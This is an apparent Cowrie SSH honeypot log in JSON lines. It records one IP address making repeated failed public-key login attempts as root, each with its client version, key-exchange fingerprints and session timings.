{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:00:57.989671Z","src_ip":"212.227.235.229","session":"b95b7fd63dfe"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-31T07:00:58.694469Z","src_ip":"212.227.235.229","session":"b95b7fd63dfe"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:00:58.695203Z","src_ip":"212.227.235.229","session":"b95b7fd63dfe"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"a5:91:a4:76:93:dd:aa:e6:b8:40:f7:18:96:db:84:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8vlPpc3X7NgX49pTAOpBIKdDQZToL5nhK+XK75dzy04bxU6znKwRRQEF42q5arOC7AWNUY8V+i9J5u1kQQGaUD4zmB8TIrCVmiSb4Fx0Kl/TQ2YzjTgo7PU7HPUk2l/SyqRlkmJbYwziygRlTiBMYcocdnpOcd7EZ+JbDHP7u1IM2pdpnokPsK4S2OT8HJ0wEmMObYTKX8efyXvHacU8Tp1oTBwgYJFVQufL+8BO2N5BBiD/FCPpso7RZqTp0yKcfvtnEDL0Duw7Xmz0JSUsKtN+uUEwJMEHPl5bo05EKI50H1t3xv6GZ32RICjaA/4gdx9p+Oc/xtvWmuvCI5/PJ","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint a5:91:a4:76:93:dd:aa:e6:b8:40:f7:18:96:db:84:f5","sensor":"my-vps","timestamp":"2025-08-31T07:00:59.053060Z","src_ip":"212.227.235.229","session":"b95b7fd63dfe"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"a5:91:a4:76:93:dd:aa:e6:b8:40:f7:18:96:db:84:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8vlPpc3X7NgX49pTAOpBIKdDQZToL5nhK+XK75dzy04bxU6znKwRRQEF42q5arOC7AWNUY8V+i9J5u1kQQGaUD4zmB8TIrCVmiSb4Fx0Kl/TQ2YzjTgo7PU7HPUk2l/SyqRlkmJbYwziygRlTiBMYcocdnpOcd7EZ+JbDHP7u1IM2pdpnokPsK4S2OT8HJ0wEmMObYTKX8efyXvHacU8Tp1oTBwgYJFVQufL+8BO2N5BBiD/FCPpso7RZqTp0yKcfvtnEDL0Duw7Xmz0JSUsKtN+uUEwJMEHPl5bo05EKI50H1t3xv6GZ32RICjaA/4gdx9p+Oc/xtvWmuvCI5/PJ","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:00:59.053885Z","src_ip":"212.227.235.229","session":"b95b7fd63dfe"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:00:59.407259Z","src_ip":"212.227.235.229","session":"b95b7fd63dfe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43000,"dst_ip":"1.2.3.4","dst_port":22,"session":"13555fb07c77","protocol":"ssh","message":"New connection: 212.227.235.229:43000 (1.2.3.4:22) [session: 13555fb07c77]","sensor":"my-vps","timestamp":"2025-08-31T07:00:59.757666Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-31T07:00:59.760093Z","src_ip":"212.227.235.229","session":"13555fb07c77"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:01:00.109647Z","src_ip":"212.227.235.229","session":"13555fb07c77"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-31T07:01:01.556663Z","src_ip":"212.227.235.229","session":"13555fb07c77"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:01:01.557318Z","src_ip":"212.227.235.229","session":"13555fb07c77"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"97:93:1e:9e:38:7f:73:6c:46:8f:0c:b3:40:1b:60:24","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcruNXAoSCo4DqHKGpCDVG1qo0B9fgztmP2LHQJ+XzCTcB6N7Mu5tatfaDFyiAORAISsiOrXLQDGaj/EGuVtoKec2YDNAdvR4PDpYMx1DNse91rMD/LFtwzjwCCdoyDzgT+mgfowEtTVabAfJWi4ZR/5zLxp0daUIopbd7Cn5xXyY/Fd42BwXHyTIz3iqlu9Fb5nJUJ49NRgfuSWl3sm67Cm3t5TE9s0lG3SE9yzlhR5K7jlVqyiXGHJuoSfCDiCfa655LPgyI+gkPNp44qE3G60w3Qp7flNuLVoEtg+xhlou5y3AsDYO8PRoZx3ohF+UYyMWIAJRlTZUKTg2m1CbR","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 97:93:1e:9e:38:7f:73:6c:46:8f:0c:b3:40:1b:60:24","sensor":"my-vps","timestamp":"2025-08-31T07:01:01.909801Z","src_ip":"212.227.235.229","session":"13555fb07c77"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"97:93:1e:9e:38:7f:73:6c:46:8f:0c:b3:40:1b:60:24","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcruNXAoSCo4DqHKGpCDVG1qo0B9fgztmP2LHQJ+XzCTcB6N7Mu5tatfaDFyiAORAISsiOrXLQDGaj/EGuVtoKec2YDNAdvR4PDpYMx1DNse91rMD/LFtwzjwCCdoyDzgT+mgfowEtTVabAfJWi4ZR/5zLxp0daUIopbd7Cn5xXyY/Fd42BwXHyTIz3iqlu9Fb5nJUJ49NRgfuSWl3sm67Cm3t5TE9s0lG3SE9yzlhR5K7jlVqyiXGHJuoSfCDiCfa655LPgyI+gkPNp44qE3G60w3Qp7flNuLVoEtg+xhlou5y3AsDYO8PRoZx3ohF+UYyMWIAJRlTZUKTg2m1CbR","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:01:01.911408Z","src_ip":"212.227.235.229","session":"13555fb07c77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37264,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b630c18ac50","protocol":"ssh","message":"New connection: 212.227.235.229:37264 (1.2.3.4:22) [session: 7b630c18ac50]","sensor":"my-vps","timestamp":"2025-08-31T07:01:01.994181Z"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:01:02.264553Z","src_ip":"212.227.235.229","session":"13555fb07c77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34540,"dst_ip":"1.2.3.4","dst_port":22,"session":"52ae36400b18","protocol":"ssh","message":"New connection: 212.227.235.229:34540 (1.2.3.4:22) [session: 52ae36400b18]","sensor":"my-vps","timestamp":"2025-08-31T07:01:02.620907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-31T07:01:02.621819Z","src_ip":"212.227.235.229","session":"52ae36400b18"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:01:02.710485Z","src_ip":"212.227.235.229","session":"7b630c18ac50"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:01:02.711407Z","src_ip":"212.227.235.229","session":"7b630c18ac50"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:01:02.978634Z","src_ip":"212.227.235.229","session":"52ae36400b18"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-31T07:01:03.693531Z","src_ip":"212.227.235.229","session":"52ae36400b18"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:01:03.694151Z","src_ip":"212.227.235.229","session":"52ae36400b18"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2e:74:08:9b:32:69:af:2e:12:ef:7c:03:d4:e1:3e:9c","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCud5bccjEu8YTi4xchj62lhuitTn3wbLDyrHCvBFleUM8tnWbsRzI1rPcFtiRGB40gsCiN0v8QHCh66HLX+pY/eq/Qdhe5b+DYMaeDVDfM+SbI6UxZ0Af0U8PTWBWoamx/ziNqfJgNFFQm9zGDkF5xwhjlQBJbtb7vmtsMc2haVeugipytuiKYWNp/mRF3T9GizsWZ2loACwrnE+5Am6aZgOOP5D8sHbkjuPh7Vji2U6JssnAp4uOA5vEeLdj8skL5lX6cRKwYhBefGPFDLcsv9rFyM2909lIgnU4EsOFCcKnUwhe8UI/cgQHT01ldCTvIYEgULtAWOquu6Ac7I5U/XS35DIv7XfJKROXh7XBBqEQBWAODlkvJO1nP8nEx1eG2uQZWwOXApB0ShQ9lyZhPyk4ynegRgt/32+g5OMcHMs2QmdSTkLRp+VTpjp+zBAminix9UaPuHfA0PuLAALLY68nCleXpfF/DCEKSQqtWG69foRcHjmwfmWlGchLOkx5m0nQ6IjRp4fTX6tCDD4hjeUNnbyj9KOviOlGBX3ijxcFH0hEZu0WMvkIY9doSbYKFfTHJ7ufRSXMGw9ljvJkeVwNKUTliG2adesftpJhqH+6Mzr3cvINeHn5N9YJWqi1tVRLeTHss1BN/pnjMraGnqBZPNDSQJgayVf+jynOQ0Q==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2e:74:08:9b:32:69:af:2e:12:ef:7c:03:d4:e1:3e:9c","sensor":"my-vps","timestamp":"2025-08-31T07:01:04.051331Z","src_ip":"212.227.235.229","session":"52ae36400b18"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2e:74:08:9b:32:69:af:2e:12:ef:7c:03:d4:e1:3e:9c","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCud5bccjEu8YTi4xchj62lhuitTn3wbLDyrHCvBFleUM8tnWbsRzI1rPcFtiRGB40gsCiN0v8QHCh66HLX+pY/eq/Qdhe5b+DYMaeDVDfM+SbI6UxZ0Af0U8PTWBWoamx/ziNqfJgNFFQm9zGDkF5xwhjlQBJbtb7vmtsMc2haVeugipytuiKYWNp/mRF3T9GizsWZ2loACwrnE+5Am6aZgOOP5D8sHbkjuPh7Vji2U6JssnAp4uOA5vEeLdj8skL5lX6cRKwYhBefGPFDLcsv9rFyM2909lIgnU4EsOFCcKnUwhe8UI/cgQHT01ldCTvIYEgULtAWOquu6Ac7I5U/XS35DIv7XfJKROXh7XBBqEQBWAODlkvJO1nP8nEx1eG2uQZWwOXApB0ShQ9lyZhPyk4ynegRgt/32+g5OMcHMs2QmdSTkLRp+VTpjp+zBAminix9UaPuHfA0PuLAALLY68nCleXpfF/DCEKSQqtWG69foRcHjmwfmWlGchLOkx5m0nQ6IjRp4fTX6tCDD4hjeUNnbyj9KOviOlGBX3ijxcFH0hEZu0WMvkIY9doSbYKFfTHJ7ufRSXMGw9ljvJkeVwNKUTliG2adesftpJhqH+6Mzr3cvINeHn5N9YJWqi1tVRLeTHss1BN/pnjMraGnqBZPNDSQJgayVf+jynOQ0Q==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:01:04.051931Z","src_ip":"212.227.235.229","session":"52ae36400b18"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:01:04.409101Z","src_ip":"212.227.235.229","session":"52ae36400b18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34554,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9d5c9e1e69f","protocol":"ssh","message":"New connection: 212.227.235.229:34554 (1.2.3.4:22) [session: b9d5c9e1e69f]","sensor":"my-vps","timestamp":"2025-08-31T07:01:04.758921Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-31T07:01:04.762558Z","src_ip":"212.227.235.229","session":"b9d5c9e1e69f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:01:05.108458Z","src_ip":"212.227.235.229","session":"b9d5c9e1e69f"}
